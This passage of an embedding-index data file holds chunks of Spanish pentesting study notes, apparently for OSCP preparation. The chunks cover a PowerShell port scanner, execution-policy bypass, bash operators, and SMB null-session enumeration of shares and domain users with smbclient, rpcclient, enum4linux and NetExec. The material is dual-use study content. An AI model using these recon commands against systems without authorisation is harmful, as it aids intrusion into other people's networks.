0.04227, -0.03361, -0.03332, -0.02953, -0.03885, 0.01574, 0.04844, -0.02468, -0.02873, -0.02833, -0.00367, -0.00876, 0.00602, -0.04948, -0.01826, 0.00467, 0.0472, 0.01313, -0.02331, 0.02862, 0.01311, 0.00617, -0.10558, 0.00195, -0.02656]} +{"tipo": "metodologia", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "texto": "## Con timeout (NO se cuelga)\n```powershell\n1..200 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"Puerto $_ ABIERTO\"}; $c.Close() }\n```", "v": [-0.10329, 0.00123, -0.0485, -0.02672, 0.08091, -0.19978, 0.0356, 0.03347, -0.04255, 0.04714, -0.11608, -0.15258, 0.01461, -0.00466, -0.06695, 0.03251, -0.09982, -0.05524, 0.03755, 0.07891, 0.02978, 0.00029, -0.0694, -0.10135, 0.06712, 0.21017, 0.00597, 0.09235, -0.1082, 0.01152, 0.0001, -0.12091, 0.06538, 0.02093, 0.05744, -0.11257, -0.04068, 0.11903, 0.07652, -0.00363, 0.07202, 0.04778, -0.07886, 0.08698, 0.07053, -0.03593, 0.07747, 0.04706, -0.0514, -0.03528, -0.086, 0.0389, -0.15125, 0.06918, -0.06446, 0.09772, 0.09241, 0.13614, -0.05583, -0.02842, 0.00493, 0.07406, 0.01065, -0.05379, -0.03594, 0.07015, -0.00387, 0.01987, -0.01539, 0.00945, -0.09668, -0.0686, -0.09216, -0.09134, 0.18223, 0.0108, 0.11602, -0.11928, 0.09368, -0.00927, -0.12602, -0.0603, -0.04179, -0.00698, -0.06325, -0.02375, 0.13001, -0.16696, -0.01785, 0.0081, 0.07888, 0.01335, -0.06956, 0.04027, -0.04571, -0.11409, -0.00837, -0.01789, 0.00402, 0.01903, 0.05757, 0.08576, -0.04488, 0.06418, 0.07168, 0.05551, 0.02519, 0.0724, -0.04475, -0.02551, 0.03779, 0.02372, -0.02986, -0.02147, -0.06881, -0.01128, -0.03126, -0.07406, 0.10583, -0.05244, -0.03834, -0.02872, -0.06854, 0.03784, 0.00495, -0.00011, -0.06505, 0.06282, 0.05828, 0.02544, 0.04755, 0.04853, -0.02063, -0.04657, -0.01722, 0.03162, 0.03431, -0.0347, 0.03174, 0.01011, 0.10952, 0.02153, 0.00938, 0.03226, 0.11707, 0.04858, 0.02933, -0.04654, -0.03895, 0.03111, 0.08947, 0.05924, -0.00835, 0.04258, 0.00236, -0.02538, -0.01445, 0.02369, -0.00764, 0.01302, 0.06583, 0.07911, 0.09634, -0.01016, -0.03876, -0.08334, -0.10238, -0.01376, 0.02321, -0.06841, -0.00114, 0.01036, -0.07269, 0.04907, 0.00767, -0.0466, 0.05548, -0.04684, 0.0022, -0.07919, 0.03726, 0.02409, -0.03701, 0.00929, -0.01573, -0.00655, -0.02267, -0.04029, 0.04172, 0.00395, 0.00203, 0.08513, -0.02817, -0.05689, -0.00473, -0.01703, -0.05597, -0.09341, -0.00826, 0.05368, -0.05076, 0.08794, 0.04571, -0.05198, -0.06363, -0.0332, -0.03958, 0.03828, -0.05903, 0.07095, -0.01836, -0.04529, -0.00359, -0.01378, -0.01762, 0.01357, 0.03463, -0.01259, -0.0029, 0.04426, -0.02116, 0.06176, -0.01723, 0.01947, 0.06195, -0.00759, 0.0137, 0.01723, 0.0389, 0.02259, -0.03914, 0.04026, -0.02453, -0.11467, 0.05256, -0.00736, -0.02604, -0.10788, -0.1718, 0.0286, 0.02373, 0.08684, -0.01321, -0.04365, -0.02746, -0.11423, -0.0497, -0.01791, 0.03374, -0.0274, 0.01083, 0.00338, -0.00553, -0.05102, 0.02104, -0.05018]} +{"tipo": "metodologia", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "texto": "## Solo puertos concretos (instantáneo)\n```powershell\n53,88,135,139,445 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"$_ ABIERTO\"}; $c.Close() }\n```", "v": [-0.10089, -0.04351, -0.07282, -0.01297, 0.09196, -0.20222, 0.05266, 0.03511, -0.03079, 0.03842, -0.12824, -0.14241, -0.02918, -0.01378, -0.03488, 0.03695, -0.10012, -0.072, -0.00424, 0.0799, 0.03428, -0.00768, -0.08503, -0.09472, 0.04737, 0.23547, 0.02058, 0.08992, -0.10595, 0.04437, 0.02833, -0.0797, 0.06396, 0.04067, 0.05064, -0.18078, -0.08424, 0.10998, 0.06565, 0.04193, 0.09296, 0.01185, -0.07244, 0.04119, 0.06306, -0.01893, 0.06028, 0.04356, -0.04729, -0.04571, -0.10182, -0.00971, -0.12794, 0.05577, -0.05447, 0.08, 0.11485, 0.13225, -0.05705, -0.03307, 0.00198, 0.11517, 0.0011, -0.05186, -0.01832, 0.0574, 0.00126, 0.00537, -0.05669, -0.02471, -0.08317, -0.05311, -0.11514, -0.03501, 0.21037, 0.03382, 0.12166, -0.13258, 0.09869, 0.02603, -0.10968, -0.0678, -0.03191, -0.02267, -0.07373, -0.02664, 0.10763, -0.12646, -0.01318, 0.01854, 0.06918, 0.02225, -0.04403, 0.0269, -0.03698, -0.09713, -0.01452, -0.0079, 0.00919, 0.01981, 0.045, 0.07087, -0.05074, 0.06361, 0.03574, 0.05247, -0.00929, 0.05285, -0.0551, -0.00906, 0.01075, 0.01042, -0.00292, -0.04289, -0.03775, 0.00415, -0.02537, -0.07671, 0.11298, -0.05425, -0.03558, -0.03556, -0.05143, 0.02556, -0.00339, 0.00151, -0.07663, 0.07277, 0.05407, 0.02967, 0.04527, 0.07238, -0.0269, -0.05723, -0.0111, 0.02457, 0.07498, -0.02544, 0.02341, 0.00912, 0.10486, 0.01966, 0.00625, 0.02811, 0.07783, 0.04993, 0.02424, -0.03228, -0.05322, 0.04342, 0.10593, 0.07301, -0.04941, 0.05698, 0.00335, -0.00616, 0.0079, 0.01085, -0.01408, 0.02155, 0.03253, 0.09625, 0.08818, -0.01167, -0.04506, -0.05725, -0.10528, -0.02233, 0.02635, -0.061, 0.01194, 0.01618, -0.09006, 0.01511, 0.02413, -0.06768, 0.03192, -0.06356, -0.00934, -0.08001, 0.0419, 0.01123, -0.04885, 0.00421, -0.03837, 0.00201, -0.00541, -0.04392, 0.04161, -0.00563, 0.02104, 0.07519, -0.0375, -0.03466, -0.00905, 0.00977, -0.06447, -0.05751, -0.02344, 0.03985, -0.05689, 0.08504, 0.04468, -0.06154, -0.07241, -0.0495, -0.0502, 0.03828, -0.05529, 0.05748, -0.02005, -0.05898, -0.00966, -0.01836, -0.02241, 0.05068, 0.04669, -0.01374, -0.01278, 0.06118, -0.01791, 0.06556, -0.00279, -0.01731, 0.06474, 0.00444, 0.00189, 4e-05, 0.03402, 0.03617, -0.03629, 0.05139, -0.03643, -0.11263, 0.03258, -0.00242, -0.00567, -0.08007, -0.16172, 0.01003, 0.03793, 0.08914, -0.00511, -0.04055, -0.02922, -0.11214, -0.04676, 0.01683, 0.03166, -0.04425, -0.0185, 0.01182, 0.01786, -0.05575, 0.01339, -0.06935]} +{"tipo": "metodologia", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "texto": "## Test rápido de un puerto\n```powershell\nTest-NetConnection IP -Port 53 -wa 0 -ea 0 # mira TcpTestSucceeded : True/False\n```", "v": [-0.17308, -0.08964, -0.15351, -0.14395, 0.13007, -0.13872, 0.09775, -0.04756, 0.02802, 0.05373, -0.02425, 0.08282, -0.02129, -0.03634, -0.07545, -0.02512, -0.02508, 0.00545, 0.08644, -0.09659, 0.09187, 0.00274, -0.16616, -0.18326, 0.1585, 0.22551, -0.11967, 0.07387, 0.06115, -0.13227, -0.06233, -0.09614, 0.10691, 0.04909, -0.0769, -0.03932, 0.04006, 0.06748, 0.1032, 0.1548, 0.07511, 0.06254, 0.00105, 0.06091, 0.14371, 0.01082, 0.10539, -0.11223, 0.04435, 0.00566, -0.10973, -0.06732, -0.06373, 0.03038, -0.09082, -0.01306, 0.03197, 0.10653, -0.02716, -0.02919, -0.07022, 0.0257, -0.02587, -0.13524, -0.00859, 0.01735, -0.00751, -0.00027, -0.1612, 0.07761, 0.01317, 0.08887, -0.02787, -0.0154, -0.01324, -0.04288, 0.1125, -0.01575, 0.08371, 0.06738, -0.01992, 0.01375, -0.01756, -0.07633, -0.13802, -0.00758, 0.02264, -0.04572, -0.05749, -0.06686, 0.06567, -0.08267, 0.01712, 0.08447, -0.00109, -0.09213, 0.04377, -0.05461, 0.05736, -0.07587, 0.04912, 0.09085, -0.05847, 0.08636, -0.00295, 0.03395, -0.04431, 0.01907, 0.03004, 0.01626, 0.04501, 0.02681, -0.03785, -0.02189, -0.01754, -0.01658, -0.07922, -0.16078, 0.01144, 0.02486, -0.01209, 0.00527, -0.03387, 0.04564, -0.01447, 0.00249, 0.05178, 0.0403, 0.05689, 0.03095, 0.04963, 0.02766, -0.10267, -0.0309, 0.02873, 0.00421, -1e-05, -0.09661, -0.0095, 0.01202, 0.04365, 0.04489, -0.05629, 0.0547, 0.05748, 0.0056, -0.04299, 0.00289, -0.06909, 0.07991, 0.01503, 0.04949, -0.07477, 0.02707, -0.00544, -0.06481, 0.02742, -0.06148, 0.02486, 0.00584, -0.05746, 0.00744, 0.00993, 0.04703, -0.02183, 0.00965, -0.07543, 0.04487, 0.02174, -0.08008, 0.03176, 0.03169, -0.07922, -0.0352, 0.05039, 0.03854, 0.04271, -0.03221, -0.05036, -0.09428, -0.02501, 0.00151, -0.04979, -0.00391, -0.01021, 0.0345, -0.00012, -0.05361, 0.02591, 0.02595, 0.02034, 0.03522, -0.01989, 0.00168, 0.03998, 0.05544, 0.02581, -0.05523, 0.02834, -0.02056, -0.04886, -0.04158, 0.03478, -0.04463, 0.02159, 0.0218, -0.024, 0.02111, -0.01364, 0.00765, -0.00089, -0.01429, 0.04362, -0.07851, -0.0203, 0.03636, 0.03067, -0.00734, -0.02253, -0.04581, -0.07502, -0.00216, -0.00677, 0.08746, -0.02113, 0.07552, 0.0018, 0.00599, 0.04538, 0.01851, 0.02838, 0.02102, -0.00599, -0.06689, 0.04213, -0.01186, -0.0104, -0.00806, -0.03322, -0.07053, -0.04096, 0.00261, -3e-05, -0.04224, -0.01776, -0.04976, -0.03297, -0.01269, 0.01185, -0.05128, -0.09371, 0.0012, 0.03395, -0.05615, 0.00881, 0.00302]} +{"tipo": "metodologia", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "texto": "## La regla clave\n- `$c.Connect()` = **síncrono**, se cuelga ~21s en puertos filtrados.\n- `$c.BeginConnect()+WaitOne(ms)` = controlas el timeout, **NO se cuelga**.\n- Para líneas largas: `notepad scan.ps1` y `powershell -ep bypass -File .\\scan.ps1`.\n\nRelacionado: Nmap · Puertos olvidados · OSCP MOC", "v": [0.14031, -0.06334, -0.10303, -0.10034, 0.00928, -0.29641, 0.02214, -0.0674, -0.08798, 0.03994, -0.06203, -0.01923, 0.03813, -0.10201, -0.07628, -5e-05, -0.07066, 0.09002, 0.03365, 0.02193, -0.10643, -0.01622, -0.10574, -0.09693, 0.08508, 0.14101, -0.03272, 0.04946, -0.15513, -0.04401, -0.0481, -0.01244, 0.0877, 0.00515, -0.00106, -0.00347, 0.01218, 0.11951, 0.15278, 0.14313, -0.02298, 0.16377, -0.09424, 0.09809, 0.14276, -0.18813, 0.08562, 0.08225, 0.00988, 0.00478, -0.09965, 0.00915, -0.1575, 0.09627, -0.0524, -0.06984, 0.11379, 0.08799, -0.06827, -0.02772, -0.02806, 0.02239, 0.04376, -0.07125, -0.0406, 0.01506, 0.01682, -0.0426, -0.06474, 0.08551, -0.09199, 0.09017, 0.00062, -0.0829, 0.0889, -0.06173, 0.05619, -0.08063, 0.15649, 0.06553, -0.00347, -0.09296, -0.06614, -0.09806, -0.05268, 0.02733, -0.00775, 0.01815, -0.09002, -0.03511, 0.12151, -0.05644, 0.00483, 0.04844, 0.00264, -0.0256, -0.05566, -0.02971, 0.06286, -0.00136, 0.09067, 0.08935, -0.0658, 0.13221, 0.0248, 0.00097, 0.02184, 0.04608, -0.00362, 0.05361, 0.06957, 0.07583, 0.03838, -0.04535, -0.09801, 0.03288, -0.02603, -0.05124, 0.0112, -0.06519, -0.01627, -0.0258, -0.01338, 0.00577, -0.0162, 0.02814, -0.0277, 0.0685, 0.07014, 0.00375, -0.02898, -0.0068, -0.0594, -0.02568, -0.0445, 0.00219, -0.03049, 0.00751, 0.02782, -0.03429, 0.00834, 0.08287, -0.01231, 0.0663, 0.11236, 0.06383, -0.0106, -0.04131, -0.07757, 0.03393, 0.06478, 0.05376, -0.01289, 0.02168, 0.04161, -0.03166, -0.01292, 0.00593, -0.05058, 0.0561, 0.02768, 0.02768, 0.02445, 0.07687, 0.01187, -0.06364, -0.02677, -0.00085, -0.02376, -0.10188, 0.00142, 0.0073, -0.05913, -0.03459, -0.04023, -0.03685, 0.09224, -0.01568, -0.01656, -0.05456, -0.01885, 0.05458, 0.02173, 0.02707, -0.09406, -0.06382, -0.05663, -0.07714, 0.01234, -0.0009, 0.05302, -0.00152, -0.00038, -0.02468, -0.00968, 0.00782, -0.03725, -0.03641, 0.00144, -0.03603, -0.01218, 0.0395, 0.0217, -0.0023, -0.01204, 0.00099, -0.03495, 0.03787, -0.06872, 0.03168, 0.02793, -0.02568, 0.0087, -0.00373, -0.04385, -0.05119, -0.00597, 0.00411, 0.00721, 0.00895, -0.01889, 0.02131, 0.04195, 0.05833, 0.04796, 0.01091, 0.06461, 0.02556, 0.00059, -0.01529, 0.0065, -0.00579, -0.00923, -0.04288, 0.06365, -0.05042, 0.00264, -0.03797, -0.07067, -0.02323, 0.00924, -0.01739, -0.04562, -0.04655, -0.09927, -0.04997, 0.0138, -0.01806, 0.00366, -0.03534, -0.01696, -0.04803, 0.0212, -0.06386, 0.0225, -0.02172]} +{"tipo": "metodologia", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "texto": "# Operadores Bash\n\n> Lo primero que hay que tener claro para encadenar comandos en Kali. Base de Bucles bash sobre IPs.\n\n```\n| tubería: salida de uno → entrada del siguiente grep open f | wc -l\n> redirige salida (SOBREESCRIBE) nmap ... > out.txt\n>> redirige AÑADIENDO al final echo nota >> log.txt\n< redirige ENTRADA desde fichero enum4linux -a IP < /dev/null\n2> redirige ERRORES (stderr) cmd 2>/dev/null\n2>&1 junta errores con salida normal cmd > todo.txt 2>&1\n; secuencia (uno tras otro, pase lo que pase) cd /tmp; ls; pwd\n&& AND: el 2º solo si el 1º tuvo ÉXITO mkdir loot && cd loot\n|| OR: el 2º solo si el 1º FALLÓ ping -c1 IP || echo caido\n& segundo plano (background) nmap -p- IP &\n$( ) sustitución de comando for ip in $(grep ...)\n* comodín enum_*.txt\n```", "v": [-0.04267, -0.14469, -0.08578, -0.00958, 0.12902, -0.17584, -0.00908, 0.04746, -0.04389, 0.05157, -0.09947, -0.16165, 0.05771, -0.17044, -0.07458, 0.00741, -0.05711, -0.01589, 0.06796, -0.16423, -0.0227, 0.11812, -0.00598, 0.00258, 0.15537, 0.16792, -0.06503, 0.06008, -0.12536, -0.09894, -0.06251, -0.07749, -0.00067, -0.03161, -0.13349, -0.0294, 0.06218, 0.04033, -0.08709, 0.21621, -0.06051, 0.06625, -0.09183, 0.04762, 0.09822, -0.17088, 0.08273, 0.10579, 0.11115, -0.04722, 0.0042, -0.03807, -0.10018, -0.07083, -0.09534, -0.01774, 0.17448, -0.03697, -0.07069, -0.02063, 0.04863, 0.0645, -0.0476, -0.06973, -0.01405, 0.01176, 0.02808, -0.03728, -0.01685, 0.06981, -0.11402, 0.05087, -0.06509, 0.01962, 0.05466, -0.07488, -0.02103, -0.08634, 0.10012, 0.07901, -0.06722, -0.00174, -0.04658, -0.05757, -0.0478, -0.12266, 0.00105, -0.08358, -0.02562, 0.06326, 0.03824, -0.017, 0.05366, 0.05694, 0.07377, -0.14597, 0.03596, 0.01204, -0.02652, -0.018, -0.01769, 0.03953, -0.1246, 0.04605, 0.07867, 0.0372, 0.10068, 0.09862, 0.00527, 0.03732, 0.04235, -0.03385, 0.06124, -0.05886, -0.03921, -0.0454, -0.01093, 0.02672, -0.00959, -0.02285, -0.08136, -0.05979, -0.04466, 0.06255, -0.10781, -0.03, -0.00022, 0.00529, 0.02873, 0.02448, 0.01484, -0.01168, -0.00127, -0.01915, -0.05486, 0.05414, 0.02406, 0.07498, -0.06883, 0.01566, 0.01386, 0.00382, -0.07206, 0.05456, 0.13555, 0.03364, 0.06399, -0.04581, -0.01292, 0.01387, 0.01111, 0.03906, 0.02963, 0.00853, 0.00174, 0.06899, 0.03176, -0.02537, -0.02925, -0.01498, -0.05449, -0.03636, 0.01383, 0.05523, -0.00391, -0.00121, -0.00241, -0.03256, 0.00834, -0.05324, -0.05332, 0.00488, -0.00141, -0.10896, -0.0217, -0.12431, 0.04401, -0.03143, 0.01181, -0.00159, 0.03168, -0.03449, 0.03523, 0.06262, 0.0053, -0.04708, -0.029, -0.01894, -0.00212, -0.02916, 0.01978, 0.04786, -0.00079, 0.00986, -0.0021, -0.00782, 0.00753, -0.03407, -0.03561, 0.02124, -0.09213, 0.03314, -0.03242, -0.01596, -0.0065, -0.0716, 0.00262, -0.01662, -0.05188, -0.02185, 0.03173, -0.0056, 0.03612, 0.01784, -0.06565, 0.0443, 0.01353, 0.09191, 0.03324, 0.00648, -0.00934, 0.04301, 0.04098, -0.03003, 0.0197, 0.04989, -0.00429, -0.02028, 0.02255, 0.06691, -0.04788, 0.02954, 0.02727, -0.03675, 0.01008, -0.01696, -0.00448, -0.01413, -0.00699, -0.04835, 0.03496, 0.01876, 0.00059, -0.07054, -0.05433, -0.03924, -0.05872, 0.0552, 0.03375, -0.01533, -0.08995, -0.03341, -0.02923, -0.06045, -0.0362, -0.03]} +{"tipo": "metodologia", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "texto": "## grep útiles\n```\ngrep -v invertir (excluir) grep -i ignorar mayus/minus\ngrep -r recursivo grep -l solo nombre del fichero\ngrep -c contar coincidencias\n```\n\n- `< /dev/null` evita que un comando se cuelgue pidiendo `Password:` (clave en bucles).\n\nRelacionado: Operadores PowerShell · Bucles bash sobre IPs · OSCP MOC", "v": [0.01698, -0.13621, -0.14659, -0.15145, 0.15542, -0.15292, 0.02231, 0.02509, -0.07116, -0.08922, -0.04262, 0.01147, -0.06002, -0.12813, 0.10157, -0.01191, -0.13894, 0.02665, -0.02627, -0.00716, -0.02107, 0.06689, 0.0032, -0.00742, -0.09763, 0.0615, -0.12712, 0.04273, -0.0908, -0.18194, -0.09961, -0.09583, -0.04481, -0.09953, -0.13069, -0.00771, -0.08065, -0.00137, -0.02627, 0.1313, -0.08833, 0.00503, -0.24053, 0.14168, 0.07998, -0.14271, 0.06625, 0.11071, -0.00728, 0.02722, -0.11243, -0.10015, -0.16902, -0.08027, -0.05763, 0.08935, 0.09478, -0.00075, -0.0292, -0.03336, -0.06376, 0.04664, 0.00905, -0.02996, 0.04507, -0.02994, 0.00016, -0.11032, -0.03506, 0.08191, -0.14753, 0.11552, -0.10318, 0.02425, 0.06278, -0.02253, 0.15526, -0.09061, 0.15973, 0.05209, -0.07106, -0.00205, -0.03611, 0.00426, -0.01888, -0.07544, 0.09112, -0.05811, -0.09514, -0.01886, 0.10798, 0.05793, 0.00902, 0.04364, 0.04569, -0.02683, -0.00661, 0.09997, 0.02182, -0.02633, 0.0026, 0.03149, -0.09921, 0.09453, 0.08081, 0.08901, 0.06002, 0.13795, 0.02432, -0.03863, -0.02021, 0.02255, 0.08081, -0.04184, 0.01141, -0.00031, -0.04037, -0.02312, 0.03146, -0.00261, -0.08175, -0.04923, 0.04018, 0.05873, -0.02641, 0.00645, 0.00305, 0.04204, 0.11121, 0.01486, -0.05919, 0.01315, 0.0175, 0.01839, -0.04158, -0.00592, 0.00687, 0.0128, 0.00332, -0.02446, 0.03205, 0.01621, -0.00059, -0.00445, 0.03341, -0.05091, 0.10668, 0.00764, 0.00243, -0.00492, 0.03437, 0.01885, -0.05838, 0.05554, 0.00745, 0.00219, 0.04629, -0.08257, 0.01189, -0.05289, -0.02798, 0.00671, 0.00667, 0.06261, -0.03906, 0.0029, -0.05741, -0.02637, 0.04149, -0.03509, -0.00216, -0.00495, -0.06691, 0.02944, -0.00448, -0.00482, -0.00818, -0.00077, -0.01379, -0.0739, 0.00751, -0.00753, 0.00883, 0.00544, 0.00602, -0.01206, 0.04172, 0.02381, 0.0102, 0.0687, -0.00175, 0.03298, -0.03547, -0.00226, -0.02328, -0.04268, 0.05574, -0.02731, 0.0434, 0.04786, -0.05911, 0.01, 0.01165, -0.04571, 0.06085, -0.01376, -0.05261, -0.01997, -0.01158, -0.04463, 0.054, 0.00112, 0.04635, -0.05613, -0.0205, -0.0383, -0.01915, 0.01741, -0.00254, 0.00202, 0.01664, 0.01359, 0.04808, 0.05771, -0.03511, 0.00916, -0.00266, -0.01766, 0.0446, 0.01195, -0.04265, 0.0182, -0.03093, -0.01638, -0.00177, -0.03252, -0.01673, -0.00873, -0.04897, -0.02012, 0.00533, 0.01527, -0.01882, -0.01829, -0.10723, -0.02414, -0.05304, -0.00317, -0.00128, -0.06478, 0.00282, 0.00506, -0.01624, -0.02691, 0.04738, -0.0164]} +{"tipo": "metodologia", "herramienta": "SMB", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "texto": "## Listar shares y usuarios\n```bash\nsmbclient -L //IP/ -N # shares con sesión nula (OJO: trunca comentarios)\nsmbclient //IP/share -N # entrar (ls, get, !cat)\nsmbclient -L //IP/ -U usuario # con credenciales\nrpcclient -U \"\" -N IP -c \"netshareenumall\" # shares + remark COMPLETO (no trunca)\nrpcclient -U \"\" -N IP -c \"enumdomusers\" # usuarios de dominio (SAM)\nenum4linux -a IP # TODO (pilla users UNIX locales por RID cycling)\nnxc smb IP -u '' -p '' --shares --users # NetExec (sucesor de CrackMapExec)\n```", "v": [0.00103, -0.16203, -0.09932, -0.13837, 0.06013, -0.33454, -0.11709, -0.08617, -0.06334, 0.11326, 0.02018, -0.12243, 0.12245, -0.16155, -0.17245, 0.00972, -0.11255, -0.02872, 0.09498, -0.01979, 0.00036, 0.16151, -0.10002, 0.00959, -0.03526, 0.14499, -0.11321, -0.03107, 0.0493, 0.00413, -0.03534, -0.14759, -0.02764, -0.01084, -0.02589, -0.15189, 0.01945, 0.01985, -0.03906, 0.1529, 0.05969, 0.04222, -0.15986, -0.05028, 0.11125, 0.03351, -0.01642, -0.07604, -0.01118, -0.15874, -0.15786, -0.05468, -0.19622, -0.00657, -0.134, 0.04172, 0.07652, -0.00011, -0.00964, -0.00622, -0.01963, 0.08611, 0.00149, -0.01621, 0.0095, -0.06578, -0.04674, 0.03156, -0.05014, -0.02887, -0.02478, 0.046, 0.01221, -0.04537, 0.09596, 0.00914, 0.0455, -0.09973, 0.10556, 0.01791, 0.01148, 0.01203, -0.08952, -0.0383, -0.02287, 0.01211, 0.13952, -0.1544, -0.01301, 0.03255, 0.07329, 0.00795, -0.02039, 0.00054, 0.01018, -0.07909, 0.06035, 0.02524, -0.00551, -0.04428, 0.02682, 0.11515, -0.12135, 0.0402, 0.05117, 0.04601, 0.06686, -0.00115, 0.00141, 0.06345, 0.03311, 0.01194, 0.00261, -0.03312, 0.02998, -0.01501, -0.05099, -0.04971, -0.0192, -0.05107, 0.01292, -0.05828, 0.01628, -0.03954, -0.03139, 0.05503, 0.01031, 0.10872, -0.02367, -0.03964, -0.05012, -0.03017, -0.01574, 0.02996, -0.01152, 0.02578, 0.01872, -0.02328, -0.04616, 0.04754, 0.02303, -0.00688, -0.04307, 0.02681, 0.0784, -0.01525, 0.00213, -0.0662, -0.04577, 0.01835, 0.08926, 0.04785, -0.04641, -0.00654, -0.0382, 0.00893, 0.02563, -0.05452, 0.00567, 0.04682, -0.00841, 0.04513, 0.04729, 0.07179, -0.00592, -0.00168, -0.05675, -0.02113, 0.04763, -0.01948, -0.01958, 0.01828, -0.02088, -0.04397, -0.02477, -0.02517, 0.01648, 0.0308, 0.00398, -0.02785, -0.02748, -0.02792, 0.01651, 0.08494, -0.00522, -0.02233, 0.00437, 0.02248, 0.00884, -0.01357, -0.00545, 0.01734, -0.05717, 0.03082, 0.0092, -0.03159, -0.0363, -0.06436, -0.04079, -0.01377, -0.05795, 0.00352, -0.05211, 0.00903, 0.02042, -0.03278, 0.01227, 0.05821, -0.01848, 0.00373, 0.01307, -0.02648, 0.06095, -0.03751, -0.07485, -0.04244, 0.01517, 0.02051, -0.01729, -0.03419, -0.03148, 0.03519, -0.02319, -0.01268, 0.00147, 0.04101, -0.02031, -0.04474, 0.035, 0.00769, -0.02248, 0.0257, -0.03313, -0.04718, 0.05895, -0.04279, -0.03454, 0.01274, 0.00051, -0.02916, -0.01588, -0.00423, 0.00771, -0.02782, -0.04959, -0.03812, -0.06552, 0.03708, 0.00529, 0.00616, -0.00439, -0.0411, 0.00927, -0.03178, -0.03555, 0.01821]} +{"tipo": "metodologia", "herramienta": "SMB", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "texto": "## Desde Windows\n```cmd\nnet view \\\\dc01 /all :: shares incl. ocultos. Admin shares: ADMIN$, C$, IPC$\n```", "v": [0.08923, 0.02086, 0.09429, -0.07683, 0.05202, -0.19584, -0.02811, -0.01776, -0.0821, 0.0316, 0.03345, -0.21217, -0.13748, -0.2033, -0.10167, -0.07829, -0.00614, -0.0504, 0.09174, 0.04364, 0.12873, -0.03129, -0.06666, -0.03839, -0.01927, 0.16645, -0.03202, -0.00424, -0.0844, -0.04522, 0.06748, -0.08936, 0.01099, 0.06723, 0.00559, -0.11222, -0.04333, 0.03413, 0.03641, 0.10561, -0.04634, 0.08628, -0.12497, 0.0555, 0.15467, -0.07425, 0.07081, 0.03885, 0.01913, -0.128, -0.10414, 0.00388, -0.10036, 0.01868, 0.02741, 0.03078, -0.01126, 0.09823, -0.02003, 9e-05, 0.0307, 0.17721, -0.01316, 0.03676, -0.09026, 0.08269, 0.00246, 0.04545, -0.01434, 0.14395, -0.09005, -0.01979, -0.01336, -0.07284, 0.11497, -0.09724, 0.04539, -0.11245, 0.13895, -0.06871, -0.038, 0.02336, 0.05174, 0.00773, 0.03779, -0.09307, 0.10657, -0.06622, -0.01567, -0.00286, 0.08737, -0.11335, -0.08159, 0.03973, -0.04992, -0.07668, 0.03372, 0.0009, -0.01193, 0.02506, 0.02032, 0.04427, -0.02625, 0.04499, -0.002, 0.12101, -0.03677, 0.03219, -0.09432, 0.00073, 0.08764, 0.06686, -0.04384, 0.04523, -0.0253, 0.04665, -0.0117, -0.01227, 0.01227, -0.01737, -0.01096, -0.09373, -0.10306, 0.01466, 0.01662, -0.07737, -0.10682, 0.08716, -0.02858, -0.00753, 0.03562, -0.01509, -0.00401, -0.08203, -0.0486, 0.05403, -0.00326, 0.03817, -0.03014, -0.04114, 0.09494, 0.08446, -0.02236, 0.02886, 0.09566, 0.08084, 0.03241, -0.05183, -0.0325, -0.02515, 0.09453, 0.00587, -0.0053, -0.01216, 0.00824, 0.03202, 0.00517, 0.023, -0.02003, -0.03127, 0.01955, 0.08965, 0.03, 0.00628, -0.06238, -0.02514, -0.10957, -0.04665, -0.01501, -0.05301, -0.01899, 0.05051, -0.01758, 0.00185, -0.0058, -0.05325, 0.03335, -0.07904, 0.00873, 0.00184, -0.00547, 0.07899, 0.04529, 0.0386, -0.03507, -0.02181, -0.0138, -0.00172, -0.02729, -0.06963, 0.01174, -0.03399, -0.00706, 0.00948, -0.0187, -0.05031, -0.05775, -0.06914, 0.01489, 0.03553, -0.07204, 0.09065, -0.01362, -0.06468, -0.01184, -0.07969, 0.00512, 0.04176, -0.0204, 0.06214, 0.0271, -0.00286, -0.01301, -0.03327, -0.03149, -0.00962, 0.08046, 0.03044, -0.04706, 0.00044, -0.01528, 0.07333, 0.02017, -0.01355, 0.07, -0.01162, -0.04901, -0.00831, 0.04809, 0.02204, -0.0153, 0.08879, 0.01703, -0.02528, 0.00873, -0.04005, 0.02748, -0.0284, -0.09215, 0.02537, -0.06552, 0.04568, 0.01888, -0.06637, -0.05382, -0.09017, 0.00638, 0.02746, 0.02502, -0.00329, -0.0134, -0.04816, -0.01653, -0.05048, -0.03679, -0.02933]} +{"tipo": "metodologia", "herramienta": "SMB", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "texto": "## Trampas\n- `smbclient -L` **trunca** comentarios → usa `rpcclient netshareenumall` para el `remark` completo.\n- Usuarios UNIX locales (`S-1-22-1`) solo los pilla `enum4linux -a` (RID cycling), **no** `enumdomusers`.\n- Automatiza la red entera con Bucles bash sobre IPs.", "v": [-0.02999, -0.20315, -0.10639, 0.00223, 0.08092, -0.28543, -0.13036, -0.11515, -0.00821, 0.12984, -0.03946, -0.16395, 0.12107, -0.03297, -0.07036, -0.09096, -0.24612, -0.02859, 0.14045, -0.01862, 0.06103, 0.03747, -0.14523, 0.01897, -0.02289, 